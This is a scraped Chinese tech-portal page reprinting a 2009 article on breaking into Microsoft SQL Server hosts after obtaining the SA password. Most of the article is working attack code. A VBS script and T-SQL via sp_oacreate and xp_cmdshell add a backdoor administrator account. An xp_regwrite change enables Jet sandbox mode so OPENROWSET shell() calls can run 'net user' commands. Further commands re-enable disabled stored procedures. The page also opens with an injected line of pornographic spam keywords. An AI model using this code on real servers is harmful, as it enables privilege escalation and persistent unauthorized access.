久久综合噜噜激激的五月天|日本久久久精品免費|一本到国产在线精品国内在线99|国产亚洲人成网站在线观看

  • 

      <td id="exp9y"></td>
    1. 

      <ruby id="exp9y"></ruby>
        <center id="exp9y"><ol id="exp9y"><video id="exp9y"></video></ol></center>
        <sup id="exp9y"></sup>
        

        

        
  
        
    
        
      
        
        
        
        
            
        
              站內(nèi)搜索
               
              
              
              
              
            
        
        
        		
      
        
    
        		
  
        
  
        
    
        
      
        
        
        		
        
        
      
        
    
        		
  
        

        

        

        

        


        

        

        
  
        
    
  
        

        

        

        

        
  
        
    
    哈爾濱百姓網(wǎng)首頁 | 操作系統(tǒng) | 軟件應(yīng)用 | 平面設(shè)計(jì) | 程序開發(fā) | 硬件維護(hù) | 網(wǎng)絡(luò)安全 
  
        

        

        

        

        
  
        
     您的位置: 哈爾濱百姓網(wǎng)  > 電腦網(wǎng)絡(luò) > 網(wǎng)絡(luò)安全 > 閱讀文章:Microsoft SQL Server SA權(quán)限最新入侵方法
  
        

        

        

        

        

        
  
        
    
        
        
        
          
        
            
        
              
        
                  
        
                    
        
                        
        
                          Microsoft SQL Server SA權(quán)限最新入侵方法
                        
        
                        
        
                          2009-4-15 16:53:11 哈爾濱百姓網(wǎng) 來源:51CTO.com 瀏覽 次  【  】【打印】【關(guān)閉
                        
        
                        
        
                          
                        
        
                        
        
                          
          Microsoft SQL Server SA權(quán)限服務(wù)器一直是黑客青睞的對象,本文再向大家介紹幾種入侵方法,讀者可以根據(jù)情況找出防范辦法。 

        

          在獲得SA密碼后,往往因?yàn)榉⻊?wù)器管理者或”前人”將net.exe和net1.exe被限制使用,無法添加管理員賬號。我們知道VBS在活動目錄(ADSI)部分有一個winnt對象,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個管理員,具體代碼如下:
        

        


        

        set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,綁定
Set oe=GetObject(os&"/Administrators,group") '屬性,admin組
Set od=ob.Create("user","test") '建立用戶
od.SetPassword "1234" '設(shè)置密碼
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用戶
oe.add os&"/test"


        

          將上面的代碼保存為1.vbs,然后執(zhí)行,命令為“cscript 1.vbs”,這樣就會在系統(tǒng)添加一個系統(tǒng)名為test,密碼為1234的用戶。具體在查詢分析器執(zhí)行的代碼如下:
        

        


        

        declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.
ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
        

          執(zhí)行完上面的語句,再執(zhí)行下面這行代碼,這行代碼一定單獨(dú)執(zhí)行,不要與上面的放在一起執(zhí)行,否則會提示“c:\1.vbs正被另一個程序運(yùn)行”而無法成功添加用戶:
        

        


        

        exec master..xp_cmdshell 'cscript c:\1.vbs'

        

          如果系統(tǒng)用戶沒有添加成功,有可能是因?yàn)橄到y(tǒng)用戶的密碼1234的太簡單,不符合服務(wù)器的復(fù)雜密碼策略,可以考慮設(shè)置的復(fù)雜些,然后再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式為:
        

        


        

        exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")
>>1.vbs'

        

          不過,不知道為什么所有帶“&”字符的命令行都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。
        

          使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關(guān)動態(tài)鏈接庫帶來的煩惱。出于安全原因,系統(tǒng)默認(rèn)情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:
        

        


        

        Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1

        

          然后執(zhí)行沙盤命令,在系統(tǒng)添加一個用戶名為test,密碼為1234的用戶:
        

        


        

        select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup 
administrators test /add")')


        

          不同的操作系統(tǒng),路徑也不一樣,需要根據(jù)情況做修改:
        

        


        

        NT/2K: c:\winnt\system32\ 
XP/2003: c:\windows\system32\

        

          另外Microsoft SQL Server2005在默認(rèn)情況下,一些存儲過程是關(guān)閉著的,需要命令打開:
        

        


        

        開啟XP_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;

開啟'OPENROWSET':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
開啟'sp_oacreate':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 
'Ole Automation Procedures',1;RECONFIGURE;


        		
                        
        
                        
        
                          
                        
        
                        
        
                          [責(zé)任編輯:佚名]
                        
        
                        
        
                          
                        
        
                        
        
                          
                        
        
                        
        
                          
                        
        
                    
        		
                  
        
              
        		
            
        
          
        
            
        
              
        
                
              
        
            
        
            
        
              
        
                
              
        
            
        
            
        
            
        
              
        
                 相關(guān)文章
              
        
              
        
                
              
        
              
        
                
        
                    
        
                      
                      
        
               ·Web服務(wù)器如何避免CC攻擊
                        (2011-3-18 13:07:03)
                        
                      
        
               ·局域網(wǎng)遭ARP攻擊網(wǎng)絡(luò)掉線批處理
                        (2010-3-2 13:34:37)
                        
                      
        
               ·保障遠(yuǎn)程桌面Web連接安全四項(xiàng)注意
                        (2010-1-25 10:28:12)
                        
                      
        
               ·教你六招處理服務(wù)器數(shù)據(jù)意外丟失
                        (2010-1-25 10:26:07)
                        
                      
        
               ·IIS安全設(shè)置讓W(xué)ebshell無用武之地
                        (2009-11-3 11:07:16)
                        
                      
        
               ·SQL Server 2000 安全模
                        (2009-9-21 14:47:07)
                        
                      
        
               ·資深網(wǎng)管教你打造SSL加密的安全站點(diǎn)
                        (2009-8-4 12:21:34)
                        
                      
        
               ·利用麥咖啡打造超安全的Web站點(diǎn)目錄
                        (2009-6-23 10:05:18)
                        
                      
        
               ·讓你的電腦在局域網(wǎng)中輕松隱身
                        (2009-4-27 11:29:38)
                        
                      
        
               ·安全防護(hù)策略-打造堡壘主機(jī)
                        (2009-4-17 9:06:45)
                        
                      
        
               ·SA弱口令帶來的安全隱患
                        (2009-4-15 16:55:38)
                        
                      
        
               ·ISA Server 2006常用功能疑難
                        (2009-4-15 16:45:32)
                        
                      
        
               ·ISA Server 2006高級應(yīng)用指南
                        (2009-4-15 16:38:42)
                        
                      
        
               ·十招妙招 確保WindowsXP系統(tǒng)安全
                        (2009-4-15 16:25:26)
                        
                      
        
               ·Windows 2003服務(wù)器安全配置終極技
                        (2009-4-15 16:18:12)
                        
                      
        
               ·Windows 2003 server變態(tài)磁盤
                        (2009-4-15 16:08:43)
                        
                      
        
               ·Windows下PHP+MySQL+IIS安全平臺III 
                        (2009-4-15 15:49:42)
                        
                      
        
               ·Windows XP中鮮為人知的熱鍵漏洞
                        (2009-4-15 15:42:55)
                        
                      
        
               ·利用xp網(wǎng)絡(luò)身份驗(yàn)證功能 讓遠(yuǎn)程連接
                        (2009-4-15 15:41:22)
                        
                      
        
               ·終級Win2003服務(wù)器安全配置篇
                        (2009-4-15 15:38:50)
                        
        
                    
        
                
        		
              
        
              
        
                
              
        
            
        
                  		
        
        
      
        		
    
        
      
        
        
      
        
    
        

        

        
      
        
        
      
        
    
        

        
      
        
        
        
           熱門文章 哈爾濱電腦
        
        
        
        
          
        
			        
			            
        
					·安全防護(hù)策略-打造堡壘主機(jī)
			            
        
					·SQL Server到底需要使用哪些端口?
			            
        
					·把重要的Word 2003文檔放到菜單中
			            
        
					·您試圖在此 Web 服務(wù)器上訪問的 
			            
        
					·Photoshop制作火焰的神龍
			            
        
					·Win2003架設(shè)多用戶隔離Ftp服務(wù)器
			            
        
					·XP系統(tǒng)服務(wù)恢復(fù)批處理
			            
        
					·還有2天發(fā)布 Windows7必備77條小知識
			            
        
					·情侶玩兒法:用虛擬硬盤打造堅(jiān)不可摧的影子系統(tǒng)
			            
        
					·用U盤當(dāng)鑰匙 輕松繞過WinXP的登陸密碼
			            
        
					·Photoshop打造漂亮的心形掛鏈壁紙
				  
        		
        
        
      
        

        
      
        
        
        
           推薦文章 哈爾濱電腦
        
        
        
        
          
        
            
            
        
        ·精簡節(jié)約!小公司辦公打印省錢全攻略
            
        
        ·CSS布局方法的十八般技巧和兼容方案
            
        
        ·三種方法 教你解決輸入法不顯示的問題
            
        
        ·當(dāng)紅情侶QQ表情:茉莉和龍井
            
        
        ·Win 7出現(xiàn)休眠Bug 微軟提供解決方案
            
        
        ·將Powerpoint文檔轉(zhuǎn)換為Word文檔
            
        
        ·非常實(shí)用來學(xué)習(xí)連續(xù)供墨系統(tǒng)入門知識
            
        
        ·怕吃虧?怕假的?鑒別真假耗材的小竅門
            
        
        ·情侶玩兒法:用虛擬硬盤打造堅(jiān)不可摧的影子系統(tǒng)
            
        
        ·開始—運(yùn)行(cmd)命令大全
            
        
        ·您試圖在此 Web 服務(wù)器上訪問的  
            
        
          
        		
        
        
      
        
	  
        
      
        
        
        
           最新文章 哈爾濱電腦
        
        
        
        
          
        
            
            
        
        ·Web服務(wù)器如何避免CC攻擊
            
        
        ·SQL Server到底需要使用哪些端口?
            
        
        ·XP系統(tǒng)服務(wù)恢復(fù)批處理
            
        
        ·局域網(wǎng)遭ARP攻擊網(wǎng)絡(luò)掉線批處理
            
        
        ·CISCO 2811 路由器配置命令全集
            
        
        ·避免“悲劇” 打印機(jī)使用技巧全面攻略
            
        
        ·保障遠(yuǎn)程桌面Web連接安全四項(xiàng)注意
            
        
        ·教你六招處理服務(wù)器數(shù)據(jù)意外丟失
            
        
        ·挑選相紙有學(xué)問 教你如何辨別相紙優(yōu)劣
            
        
        ·精簡節(jié)約!小公司辦公打印省錢全攻略
            
        
        ·CSS布局方法的十八般技巧和兼容方案